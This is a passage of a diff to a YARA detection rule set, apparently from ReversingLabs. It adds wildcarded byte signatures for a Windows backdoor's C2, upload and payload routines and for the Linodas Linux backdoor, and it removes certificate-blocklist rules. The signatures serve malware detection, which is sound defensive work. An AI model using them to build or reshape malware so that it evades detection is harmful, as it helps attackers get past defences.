+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ??
+            48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C
+            24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83
+            C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83
+            C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ??
+            8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B
+            5B ?? 49 8B 73 ?? 49 8B E3 5F C3
+        }
+		$create_cab_file_and_upload_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1
+            48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8
+            ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ??
+            ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ??
+            0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D
+            05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ??
+            ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ??
+            ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
+            15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8
+            ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
+        }
+		$create_cab_file_and_upload_p2 = {
+            8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45
+            33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8
+            FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9
+            ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15
+            ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B
+            C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B
+            D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33
+            D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33
+            C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40
+            ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B
+        }
+		$create_cab_file_and_upload_p3 = {
+            44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ??
+            ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48
+            83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ??
+            ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44
+            8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05
+            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24
+            ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ??
+            ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48
+            85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24
+            ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2
+            41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74
+        }
+		$create_cab_file_and_upload_p4 = {
+            8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33
+            C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ??
+            ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B
+            D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48
+            8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B
+            CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44
+            8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15
+            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B
+            CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B
+            AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3
+        }
+		$cmd_expand_payload_p1 = {
+            40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
+            ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC
+            24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44
+            89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ??
+            E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7
+            44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33
+            D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ??
+            ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF
+            15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ??
+            ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ??
+            ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
+            33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$cmd_expand_payload_p2 = {
+            44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24
+            ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C
+            89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8
+            ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ??
+            ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB
+            FF 15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            41 5D 5D 5B C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fortuna Games Co., Ltd." and pe.signatures [ i ] . serial == "02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( all of ( $cmd_expand_payload_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Linodas backdoor."
 		author = "ReversingLabs"
-		id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2b197346-abce-5cff-938f-bb8742e03168"
+		date = "2024-05-22"
+		modified = "2024-05-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L243-L259"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Linodas"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures [ i ] . serial == "40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "aebba591-2024-584a-bba6-9a27049cf4b8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L261-L277"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$persistence_mechanism_ubuntu = {
+            41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89
+            EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48
+            89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48
+            81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48
+            89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ??
+            48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ??
+            48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ??
+            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F
+            85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7
+            E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F
+            85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24
+            ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48
+            89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ??
+            48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49
+            39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
+        }
+		$network_communication_1 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ??
+            ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D
+            6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ??
+            ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45
+            ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ??
+            48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24
+            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$network_communication_2 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ??
+            ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ??
+            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83
+            78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ??
+            4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48
+            8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74
+            ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6
+            EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C
+            24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3
+        }
+		$persistence_mechanism_redhat_v11 = {
+            41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24
+            ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C
+            24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74
+            24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8
+            ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ??
+            ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9
+            ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ??
+            ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9
+            BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24
+            48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ??
+            ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85
+            ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41
+            5E 41 5F C3
+        }
+		$change_timestamp_and_read_config_v11 = {
+            55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ??
+            ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ??
+            ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ??
+            ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$generate_machine_id_v11 = {
+            41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C
+            24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ??
+            ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41
